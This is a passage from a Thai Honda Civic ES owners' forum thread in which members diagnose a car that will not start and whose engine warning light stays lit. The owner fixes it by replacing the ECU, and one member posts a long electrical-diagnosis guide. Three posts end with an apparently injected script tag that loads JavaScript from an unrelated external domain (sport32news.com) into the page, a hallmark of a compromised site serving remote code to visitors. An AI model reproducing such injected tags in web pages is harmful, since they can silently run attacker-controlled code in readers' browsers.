ตอบ
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
พฤหัส, 2 ตุลา 2014 18:19 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
อาการคือบิดกุญแจ ON ไฟรูปเครื่องติดแล้วไม่ดับ ติดค้างตลอด สตาร์ทไม่ติด ไดสตาร์ททำงานปกติเครื่องหมุน
เช็คปลั๊กเซ็นเซอร์ต่าง ๆ ก็แน่นปกติ ถอดขั้วแบตแล้วไม่หาย เช็คโค๊ดเองไม่เป็นอยากรู้เหมือนกันว่าไฟที่โชว์เป็นเพราะเซ็นเซอร์ตัวไหน ก่อนหน้านี้ไม่มีอาการใด ๆ ทั้งสิ้นขับได้ตามปกติ TDC เปลี่ยนแล้ว แบตไม่หมด (มีเกจวัด+ทดลองเอามิเตอร์จับ)
ใครเคยเจอ หรือมีคำแนะนำอะไรบ้างมั้ยครับ รถอยู่ในนอร์ทปาร์ค หลักสี่ คืนนี้จอดไว้ที่ทำงานนั่ง Taxi กลับบ้าน พรุ่งนี้ว่ากันใหม่ ลุ้นนิดนึงว่าช่างจะมาช่วยดูให้ที่ทำงานหรือป่าว ดูแล้วจะเจออะไรบ้าง
ปล. ขอบคุณ คุณสอง ที่โทรถามความคืบหน้า , คุณนพที่แนะนำวิธีเช็คเบื้องต้นให้
ได้รับคำขอบคุณจาก: taomang  song  qq  karnmotocross01  kittikhom 
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 2 ตุลา 2014 19:54 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
ไม่เคยเป็นครับ มารอฟังสาเหตุ
ได้รับคำขอบคุณจาก: Saka  taomang  karnmotocross01  kittikhom 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 2 ตุลา 2014 20:02 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
ต้องการขนไรไปมั่ง ว่ามาเลย"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: Saka  bhumipat  taomang  karnmotocross01 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 3 ตุลา 2014 08:28 - ไฟเครื่องโชว์ สตาร์ทไม่ติด

เงียบกริ๊บ...ไม่มีใครเคยเป็นเลยเหรอ
ได้รับคำขอบคุณจาก: taomang  karnmotocross01 
Sprites


ชื่อเล่น: ไปรท์

เข้าร่วม: 11 มีนา 2013
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 30
ให้คำขอบคุณ: 57

ที่อยู่: จังหวัดนนทบุรี ถ.งามวงศ์วาน
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 3 ตุลา 2014 08:48 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
มาช่วยดันคับ เอาใจช่วยขอให้รถกลับเป็นปกติไวๆนะคับ
ได้รับคำขอบคุณจาก: Saka  karnmotocross01 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 3 ตุลา 2014 08:50 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
ไฟเครื่องโชว์แต่สตาร์ทไม่ติด ไม่เคยเป็นเลยครับ"<script src="https://sport32news.com/civicesgroup.js"> มารอเป็นเพื่อนครับ
ได้รับคำขอบคุณจาก: Saka  karnmotocross01 
dantouch


ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

ที่อยู่: พระโขนง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 3 ตุลา 2014 09:26 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
เท่าที่เคยซ่อมมานะครับ มี 2 อย่าง 
1.  ดีเลย์ปั้มติ๊กเสียครับ  อันนี้เชียงกงอันละ 300
2.  กล่อง EUC  อันนี้ที่ไม่อยากจะบอกที่เสียเพราะว่าคาร์ปาซิเตอร์ หรือ ตัวเก็บประจุมันระเบิด  ส่วนอันนี้ ลองขอยืมเพื่อนมาลองดูก่อนนะครับ
ได้รับคำขอบคุณจาก: Saka  qq  karnmotocross01  Keawchanas 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 3 ตุลา 2014 09:32 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
เป็นที่อะไรหว่า สงสัยคงจะต้องเช็คโค๊ด เพื่อจะได้รู้ว่าเป็นที่อะไร
(เป็นกำลังใจให้ครับ ขอให้หายไวๆนะครัชช มีอะไรที่ผมพอจะช่วยเหลือได้ ก็โหลๆ มาได้เบยย จร้าาา ไม่ต้องเกรงใจ)
ได้รับคำขอบคุณจาก: Saka  karnmotocross01  Keawchanas 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 3 ตุลา 2014 17:42 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
dantouch พิมพ์ว่า:
เท่าที่เคยซ่อมมานะครับ มี 2 อย่าง 
1.  ดีเลย์ปั้มติ๊กเสียครับ  อันนี้เชียงกงอันละ 300
2.  กล่อง EUC  อันนี้ที่ไม่อยากจะบอกที่เสียเพราะว่าคาร์ปาซิเตอร์ หรือ ตัวเก็บประจุมันระเบิด  ส่วนอันนี้ ลองขอยืมเพื่อนมาลองดูก่อนนะครับ


รีเลย์เสีย ไฟโชว์ด้วยเหรอ เช็คอย่างไงได้บ้างครับ มีตัวอื่นที่เหมือนกันถอดมาลองได้ป่าว
ecu ถอดมาเปิดดูแล้วไม่มีกลิ่นไหม้ สภาพทั้วไปปกติไม่มีรอยไหม้ครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 3 ตุลา 2014 17:44 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
song พิมพ์ว่า:
เป็นที่อะไรหว่า สงสัยคงจะต้องเช็คโค๊ด เพื่อจะได้รู้ว่าเป็นที่อะไร
(เป็นกำลังใจให้ครับ ขอให้หายไวๆนะครัชช มีอะไรที่ผมพอจะช่วยเหลือได้ ก็โหลๆ มาได้เบยย จร้าาา ไม่ต้องเกรงใจ)


ตอนนี้ได้ช่างแสบมาช่วยแล้วครับ แต่ปัญหาคือเสียบเครื่องมือแล้วเครื่องเช็คโค๊ดมันไม่เห็นกล่อง ช่างแสบยังเซ็งอยู่เลย
ขอบคุณ คุณสองด้วยครับ หากมีไรจะโทรหา หายเป็นปกติจะไปแจมนอกรอบของเมืองทอง
ได้รับคำขอบคุณจาก: karnmotocross01 
kkanakornkum


ชื่อเล่น: เค

เข้าร่วม: 04 มกรา 2014
ตอบ: 495

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 275
ให้คำขอบคุณ: 37

ปี: 2002
สี: น้ำเงิน วิวิด (มุก) (B-502P)
ศุกร์, 3 ตุลา 2014 17:54 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
รายงานความคืบหน้าด้วยนะครับ ผมขอให้พี่หายไวๆครับ
ได้รับคำขอบคุณจาก: Saka  karnmotocross01 
dantouch


ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

ที่อยู่: พระโขนง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 3 ตุลา 2014 18:37 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
Saka พิมพ์ว่า:
song พิมพ์ว่า:
เป็นที่อะไรหว่า สงสัยคงจะต้องเช็คโค๊ด เพื่อจะได้รู้ว่าเป็นที่อะไร
(เป็นกำลังใจให้ครับ ขอให้หายไวๆนะครัชช มีอะไรที่ผมพอจะช่วยเหลือได้ ก็โหลๆ มาได้เบยย จร้าาา ไม่ต้องเกรงใจ)


ตอนนี้ได้ช่างแสบมาช่วยแล้วครับ แต่ปัญหาคือเสียบเครื่องมือแล้วเครื่องเช็คโค๊ดมันไม่เห็นกล่อง ช่างแสบยังเซ็งอยู่เลย

ขอบคุณ คุณสองด้วยครับ หากมีไรจะโทรหา หายเป็นปกติจะไปแจมนอกรอบของเมืองทอง



งั้นมีความเป็นไปได้สูงครับ กล่องเสีย

ส่วนเมนรีเลย์ปั้มติ๊ก ฮอนด้าเหมือนกัน ใส่ด้วยกันได้ครับ
ได้รับคำขอบคุณจาก: karnmotocross01  Saka 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
ศุกร์, 3 ตุลา 2014 20:58 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
dantouch พิมพ์ว่า:
Saka พิมพ์ว่า:
song พิมพ์ว่า:
เป็นที่อะไรหว่า สงสัยคงจะต้องเช็คโค๊ด เพื่อจะได้รู้ว่าเป็นที่อะไร
(เป็นกำลังใจให้ครับ ขอให้หายไวๆนะครัชช มีอะไรที่ผมพอจะช่วยเหลือได้ ก็โหลๆ มาได้เบยย จร้าาา ไม่ต้องเกรงใจ)


ตอนนี้ได้ช่างแสบมาช่วยแล้วครับ แต่ปัญหาคือเสียบเครื่องมือแล้วเครื่องเช็คโค๊ดมันไม่เห็นกล่อง ช่างแสบยังเซ็งอยู่เลย

ขอบคุณ คุณสองด้วยครับ หากมีไรจะโทรหา หายเป็นปกติจะไปแจมนอกรอบของเมืองทอง



งั้นมีความเป็นไปได้สูงครับ กล่องเสีย

ส่วนเมนรีเลย์ปั้มติ๊ก ฮอนด้าเหมือนกัน ใส่ด้วยกันได้ครับ


สตาร์ตได้แล้ว ขับได้ปกติแล้ว
แก้ไขโดยเปลี่ยนกล่องใหม่ ช่างแสบเอกล่องสตีม d17a at เสียบปุ๋บปกติเลย
ตอนนี้อยู่ในช่วงสังเกตอาการ
dantouch


ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

ที่อยู่: พระโขนง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 3 ตุลา 2014 22:45 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
Saka พิมพ์ว่า:
dantouch พิมพ์ว่า:
Saka พิมพ์ว่า:
song พิมพ์ว่า:
เป็นที่อะไรหว่า สงสัยคงจะต้องเช็คโค๊ด เพื่อจะได้รู้ว่าเป็นที่อะไร
(เป็นกำลังใจให้ครับ ขอให้หายไวๆนะครัชช มีอะไรที่ผมพอจะช่วยเหลือได้ ก็โหลๆ มาได้เบยย จร้าาา ไม่ต้องเกรงใจ)


ตอนนี้ได้ช่างแสบมาช่วยแล้วครับ แต่ปัญหาคือเสียบเครื่องมือแล้วเครื่องเช็คโค๊ดมันไม่เห็นกล่อง ช่างแสบยังเซ็งอยู่เลย

ขอบคุณ คุณสองด้วยครับ หากมีไรจะโทรหา หายเป็นปกติจะไปแจมนอกรอบของเมืองทอง



งั้นมีความเป็นไปได้สูงครับ กล่องเสีย

ส่วนเมนรีเลย์ปั้มติ๊ก ฮอนด้าเหมือนกัน ใส่ด้วยกันได้ครับ


สตาร์ตได้แล้ว ขับได้ปกติแล้ว
แก้ไขโดยเปลี่ยนกล่องใหม่ ช่างแสบเอกล่องสตีม d17a at เสียบปุ๋บปกติเลย
ตอนนี้อยู่ในช่วงสังเกตอาการ


ไม่ต้องสังเกตหรอกครับ กล่องเสีย
ได้รับคำขอบคุณจาก: Saka 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
เสาร์, 4 ตุลา 2014 06:45 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
กล่องเสียมีสาเหตุหลัก ๆ 2 อย่างคือ กล่องมันเสียของมันเอง อันนี้เปลี่ยนแล้วจบไม่ต้องกังวลหรือสังเกตตามที่คุณแดนบอก
กับอีกอาการคือเซ็นเซอร์ตัวใดตัวหนึ่งเสีย หรือสายไฟเส้นใดเส้นหนึ่งช๊อต แล้วทำให้กล่องพัง อันนี้แหละน่าห่วง
ได้รับคำขอบคุณจาก: taomang  dantouch 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 4 ตุลา 2014 08:10 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
ตามเก็บข้อมูลครับ"<script src="https://sport32news.com/civicesgroup.js">
dantouch


ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

ที่อยู่: พระโขนง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 5 ตุลา 2014 21:20 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
กล่องเสีย เกิดจาก 2 อย่างครับ
1.  เสียด้วยตัวมันเอง  ชิ้นส่วนอิเล็คโทรนิค  มันมีอายุการใช้งานครับ มันจะเสื่อมสภาพไปเอง หรือมันทนไม่ไหวก็จะแตก
2.  ก่อนหน้านี้ไปทำอะไรที่เกี่ยวกับระบบไฟฟ้าหรือเปล่าโดยที่เราไม่ได้ถอดขั่วแบต เวลามันช็อต ถ้าเส้นที่ช๊อตไม่มีฟิส์วก็จะไปถึงกล่องทันที
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
อาทิตย์, 5 ตุลา 2014 21:42 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
การที่จะวิเคราะห์ปัญหาที่เกิดขึ้น ว่ามันมาจากสาเหตุอะไรบ้าง สำหรับท่านเจ้าของรถที่ไม่ใช่ช่างอาจจะทำไม่ได้ หรือแม้แต่ช่างเองก็ตามหากไม่เข้าใจว่าระบบการทำงานของระบบเครื่องยนต์ที่ควบคุมด้วยระบบ ECU มันมีขั้นตอนจุดเริ่มต้นของวงจรที่ควบคุมการทำงานของเครื่องยนต์ มาจากส่วนไหนบ้างและอย่างไร ต้องเข้าใจและอยู่ในสมองได้เป็นอย่างดี เมื่อเกิดปัญหาในระบบเครื่องยนต์ ควรจะเริ่มต้นตรวจสอบส่วนที่เกี่ยวข้องหลักๆ ในการที่จะทำให้เครื่องยนต์ทำงาน ได้ที่ส่วนไหนบบ้าง อย่าใช้วิธีคาดว่าคิดว่าและน่าจะเป็น เพราะมันจะไม่ตรงประเด็น อาจจะทำให้อุปกรณ์ที่ไม่เสียกลับเสียหายได้ หรือของที่ดีบอกว่าเสีย ไปซื้อมาเปลี่ยนก็เหมือนเดิม ทำให้การแก้ไขไม่ตรงประเด็น เจ้าของรถไม่ควรเสียเงินในส่วนที่ไม่ควรจะเสีย เรื่องเล็กบานปลายเป็นเรื่องใหญ่

ผมคงไม่ไปกล่าวว่าเริ่มต้นทำอย่างไร ตรวจสอบวิเคราะห์อย่างไร เพราะอธิบายกันยืดยาวในวิธีการตรวจสอบ ก็อยากแนะนำเบื้องต้นในการแก็ปัญหาเคร่าๆดังนี้ครับ

การที่บอกว่าบิดสวิชท์กุญแจไปที่ตำแหน่ง ON แล้วไฟที่หน้าปัทม์ติดโชว์สถานะของไฟแบ็ต ไปรูปเครื่องยนต์และอื่นๆนั้น การที่ต่ำแหน่ง ON นี้จะต้องมีไฟติดโชว์ให่เห็นตลอดอยู่แล้ว จนกว่าเครื่องยนต์จะสตาร์ทติด เมื่อเคื่องยนต์สตาร์ทติด ระบบไดน์ชาร์จทำงาน มันก็จะตัดระบบกราวด์ของหลอดไฟที่ติดอยู่ให้หลอดไฟดับ แสดงให้ทราบว่าระบบไดน์ชาร์จทำงานปกติ เนื่องจากท่านเจ้าของบอกว่า สตาร์ทเครื่องไม่ติด ไฟที่โชว์ที่หน้าปัทม์ก็ยังคงติดตลอด เมื่อกุญแจอยู่ที่ตำแหน่ง ON ถือว่าปกติ

ดังนั้นส่วนที่จะต้องทำการตรวจสอบจึงเป็นระบบไฟที่จ่ายให้กับระบบเครื่องยนต์ทำงาน ก่อนอื่นให้ตรวจสอบไฟที่มาจากฟิวส์เมนและจากฟิวส์เมนจะแบ่งแยกออกเป็นสามชุด ชุดแรกจะูต่อตรงดยไม่ผ่านสวิชท์ใดๆไปจ่ายให้กับกล่อง ECU ตลอดเวลา ชุดที่สองจากฟิวส์เมนจะถูกแยกออกไปให้กับระบบสตาร์ท ผ่านสวิชท์กุญแจรถที่ตำแหน่ง ON และ ST (ต่ำแหน่งสตาร์ท) กับชุดที่สาม เป็นการต่อกระแสไฟจากฟิวสเมน ผ่านหน้สาคอนแท็คของตัวเมนรีเรย์ ไฟที่ผ่านจุดนี้ จะนำไปจ่ายให้กับระบบหัวฉีด ระบบไฟในวงจรจุดระเบิด ระบบไฟที่จ่าให้กับตัวปั้มติ๊กในถังน้ำมัน และระบบวงจรที่เป็นส่วนประกอบในการทำงานของเครื่องยนต

สิ่งที่กล่าวมานี้ อยากให้ท่านเจ้าของกระทู้ตรวจสอบ หรือจะให้ช่างตรวจสอบก็ได้ เพราะเท่าที่บอกว่า ช่างเอาเครื่องมือตรวจสอบ(คงจะเป็นเครื่อง scan Tool OBD-2 )คอนเน้คเข้ากับ ECU แล้วไม่สามารถอ่าน Error code ได้ แสดงให้เห็นว่า น่าจะไม่มีไฟมาจ่ายให้กับกล่อง ECU น่าจะมีฟิวส์ของไฟที่จ่ายให้กับกล่อง ECU ขาด ลองตรวจสอบดูว่ามีหรือเปล่า

กัีบการตรวจสอบระบบไฟในสเต็ปที่สอง ให้ช่างตรวจสอบดู คือให้บิดสวิชท์กุญแจไปที่ต่ำแหน่ง ST (สตาร์ทเครื่องยนต์) แล้วให้วัดไฟที่จ่ายให้กับหัวฉีด หรือระบบวงจรไฟของวงจรจุดระเบิด หรือไฟที่จ่ายให้กับปั้มติ๊กอย่างหนึ่งอย่างใด ว่ามีไฟจ่ายให้หรือเปล่า ในจุดนี้ให้บิดสวิชกุญแจในต่ำแหน่งสตาร์ทแบบเร็วๆเช่นเดียวกับระเวลาที่เคยสตาร์ทรถ ในขณะวัดไฟ เพราะมีไฟจ่ายให้กับมอเตอร์สตาร์ททำงาน หากให้ดีควรเอาสายไฟที่ผ่านสวิชท์ต่ำแหน่ง ST ออกจากตัวแม็คเนติคคอย ที่ตัวมอเตอร์สตาร์ท จะทำให้มอเตอร์สตาร์ทไม่ทำงาน สามารถบิดกุญแจในตำแหน่ง ST ค้างไว้ได้นานๆ เพื่อวัดไฟ แต่ในความเป็นจริง ช่างจะเลือกใช้วิธีวัดไฟที่ไปเข้าหัวฉีดน้ำมัน หรือสายไฟที่ไปจ่ายให้ปั้มติ๊ก โดยใช้เข็มหมุดแทงสายไฟเทียบกับกราวด์ แล้วบิดถุญแจไปต่ำแหน่ง ST ก็จะรู้ทันทีว่ามีไฟหรือไม่

สมมุติว่าไม่มีไฟ ให้ตรวจสอบฟิวส์ของเมนรีเรย์ว่าขาดหรือไม่ และสมมุติต่อไปอีกว่าหากตรวจสอบทั้งสามกรณีที่กล่าวมาแล้วเป็นปกติ คราวนี้ให้ทำการตรวจสอบวงจรจุดระเบิดว่าทำงานปกติหรือไม่ ง่ายๆก็แบบที่เจ้าของรถทำได้ คือดึงสายไฟที่ไปเข้าหัวเทียนหนึ่งหัวเทียนใด ออกมาวางใกล้ๆกับกราวด์ตัวถังรถหรือตัวเครื่องยนต์ แล้วทำการสตาร์ทเครื่องว่ามีไฟสูงอาร์คระหว่างปลายสายหัวเทียนกับกราวด์หรือไม่ สมมุตว่ามี ก็ให้ไปตรวจสอบเรื่องการทำงานของปั้มติ๊ก ว่าในจังหวะที่บิดสวิชท์กุญแจไปที่ตำแหน่ง ST( ไม่ใช่ต่ำแหน่ง ON) ปั้มทำงานส่งน้ำมันหรือเปล่า ( ถอดสายท่อน้ำมันที่เข้ากรองเบ็นซิลออก แล้วบิดกุญแจไปที่ตำแหน่ง ST จะต้องมีน้ำมันพุ่งออกมาอย่างแรง ถือว่าปกติ

สำหรับการตรวจระบบไฟสูงที่จ่ายให้กับหัวเทียน ที่กล่าวมาข้างบนนี้ สมมุติว่าไฟสูงไม่มี ให้ตรวจสอบตามนี้ ขั้นแรกให้ทำการตรวจสอบสัญญาณพัลส์ ที่ได้จากตัว TDC sensor ว่าในขณะที่ทำการสตาร์ทเครื่องยนต์ มีสัญญาณพัลส?ออกมาหรือไม่ ทำอย่างไร ในกรณีที่ช่างไม่มีเครื่องมืออีเลคโทรนิคส์ พวก Oscilloscope ตรวจจับสัญญาณพัลส์ ก็ให้ทำการวัดค่าความต้านทานของตัว TDC sensor ว่ามีค่าความต้านทานได้หรือไม่ หากตัวมันปกติจะวัดค่าความต้านทานได้ ประมาณ 600-700 Ohm หากเสียจะวัดไม่ขึ้น

ทำไมถึงแนะนำให้ตรวจสอบที่จุดนี้ก่อน เพราะว่าในวงจรจุดระเบิดของเครืองยนต์ จะเริ่มการทำงานของระบบจุดระเบิดที่นี้ก่อนเป็นอันดับแรก ซึ่งตัว TDC sensor เป็นตัวที่ตรวจจับมุมองศาการเคลื่อนที่ของลูกสูบสู่จุดศูนย์ตายบน ซึ่งจะได้จากกานหมุนของเพลาข้อเหวี่ยง เป็นองศา สัญญาณที่เกิดจากตัว TDC sensor นี้ เป็นสัญญาณพัลส์ที่ไดจากปิคอัพคอยสร้างสัญญาณ สัญญาณนี้จะถูกส่งไปให้ กล่อง ECU เมื่อ ECU ได้รับสัญญาณนี้แล้ว มันก็จะ Generate สัญญาณจุดระเบิด IGT ส่งไปให้วงจรช่วยจุดระเบิดทำงานสร้างไฟสูงใให้กับหัวเทียน

ดังนั้นในการวิเคราะห์ระบบวงจรไฟจุดระเบิด จะต้อวตรวจสอบด้วยเครื่องมือทางด้านอีเลคโทรนิคส์ Oscilloscope ถึงจะตรวจสอบได้ถูกต้องและตรงประเด็น เพราะสามารถเห็นรูปร่างการทำงานของระบบต่างๆที่ควบคุมการทำงานของเครื่องยนต์ จะใช้แบบตาดูหูฟังแบบเก่าๆคงจะไม่สามารถแก้ไขให้ตรงประเด็นและเสียเวลาน้อยในการตรวจซ่อม

ในการณีที่จะวิเคราะห็ว่า กล่อง ECU เสีย จะต้องพิสูจน์ให้เห็นจริงว่าเสียที่ส่วนใดเสียก่อน เพราะอย่างในกรณีของท่านเจ้าของกระทู้ ผมคิดว่าบางครั้งอาจจะเส้นผมบังภูเขาเรื่องระบบไฟ อาจจะมีฟิวส์บางตัวขาดก็ได้ หรืออาจจะเสียจริงในระบบบางส่วน ในกล่อง ECU ที่อาจจะเสียเหมือนช่างที่ตรวจพบว่าเป็นการเสียของตัว capacitor ตัวที่ทำหน้าที่ ฟิลเตอร์กระแสไฟในบางส่วนของภาคเจนเนอเรทสัญาณพัลส์ มีอาการบวมหรือมีตระกรันขี้เกลือจับโคนขาเสียบของ capacitor ซึ่งก็ถือว่าเป็นหญ้าปากคอก ที่พบกันเสมอ ทำมันไมถึงทำให้ระบบการทำงานของภาคส่วนการสร้างสัญญาณพัลส์ไม่ทำงาน เพราะว่าในตัวคาปาซิเตอร์ ที่ใช้ฟิลเตอร์ระบบกระแสไฟในวงนั้นๆ เป็นประเภทอีเลคโตรไลท์ พวกกรดแบ็ตเตอรี่ เมื่อนานไปจำทำให้เกิดการลีคระหว่างแผ่นไดอีเลคทริคทำให้เสมือนเกิดค่าความต้านทานเกิดขึ้นภายในตัวของมัน ค่าความต้านทานที่เกิดขึ้นนี้จะทำให้มีกระแสไฟจำนวนหนึ่ง จะมากหรือน้อย ขึ้นอยู้กับว่าเกิดค่าความต้านมากมากน้อยเท่าใด หากน้อยจะยิ่งทำให้กระแสไฟที่เลี้ยงวงจรภาคนั้นๆ ไหลผ่านลงกราวด์ทำให้กระแสไฟที่จ่ายให้กับวงจรนั้นๆเหลือน้อยหรือไม่มีเลย ก็ทำให้วงจรนั้นๆไม่ทำงาน ก็เป็นที่มาที่ไปในกรณีที่ตรวจพบว่ามีตัวคาปาซิเตอร์บวมและมีน้ำยาอีเลคโตรไลท์ไหลเป็นก้อนตระกรันสีเขียวอ่อนจับรอบๆขอเสียบ



สำหรับปัญหาของท่านเจ้าของกระทู้อยากจะให้ตรวจสอบตามที่แนะนำมาเบื้องต้นแค่นี้ก่อน เพราะปัญหาที่มักจะตรวจพบก็มาจากตามประเด็นที่ผมกล่าว อาจจะตรงหรือไม่ตรงก็ได้ อะไรก็เกิดขึ้นได้เสมอในระบบวงจรอีเลคโทรนอคส์ สิ่งที่เคยตรวจพบ คราวต่อไปอาจจะไม่ใช่ก่ได้ แต่หากเมื่อไดมีการตรวจสอบด้วยระบบเครื่องมืออีเลคโทรนิคว์แล้ว ก็จะแก้ปัญหาได้ตรงประเด็น และเสียเววลาน้อนในการตรวจซ่อม ผมต้องขออภัยเพื่อนๆด้วยที่คำถามไม่มากมายอะไร แต่คำตอบที่ผมจัดให้มันมาก เพราะต้องการให้คิดตามว่าควรจะตรวจสอบอย่างไรในแนวทางการวิเคราะห์ปัญหา มีอีกหลายอย่างที่ยังไม่ได้กล่าวถึง แต่คิดว่าน่าจะพอใช้เป็นข้อมูลในการแก้ปัญหาได้บ้าง.......srithano
ได้รับคำขอบคุณจาก: Saka 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
จันทร์, 6 ตุลา 2014 09:38 - ไฟเครื่องโชว์ สตาร์ทไม่ติด
ขอชี้แจงคุณ srithanon ดังนี้
1. บิดสวิชท์กุญแจไปที่ตำแหน่ง ON แล้วไฟที่หน้าปัทม์ติดโชว์สถานะของไฟแบ็ต ไปรูปเครื่องยนต์และอื่นๆนั้น การที่ต่ำแหน่ง ON นี้จะต้องมีไฟติดโชว์ให่เห็นตลอดอยู่แล้ว จนกว่าเครื่องยนต์จะสตาร์ทติด
ตอบ รถรุ่นอื่นผมไม่แน่ใน แต่สำหรับ ES ไฟเครื่องจะขึ้นแป๊บเดียวเท่านั้นและจะดับลงไม่ติดค้าง หากติดค้างระบบผิดปกติแน่นอนครับ ส่วนไฟแบตก็ตามที่บอกมาถูกต้องแล้ว
2. ก่อนอื่นให้ตรวจสอบไฟที่มาจากฟิวส์เมนและจากฟิวส์เมนจะแบ่งแยกออกเป็นสามชุด
ตอบ ผมไม่ได้เป็นช่าง แต่ทำรถเองมาตลอด ฟิวเป็นอย่างแรกเลยที่จะเช็ค ซึ่งเช็คด้วยตา ตามด้วยเช็คด้วยเครื่องมือบ้าน ๆ แบบที่ร้านไดนาโมใช้ และเช็ครอบที่สามโดยใช้มิเตอร์ สรุปไฟมาและฟิวปกติ
3. scan Tool OBD-2 )คอนเน้คเข้ากับ ECU แล้วไม่สามารถอ่าน Error code ได้ แสดงให้เห็นว่า น่าจะไม่มีไฟมาจ่ายให้กับกล่อง ECU น่าจะมีฟิวส์ของไฟที่จ่ายให้กับกล่อง ECU ขาด
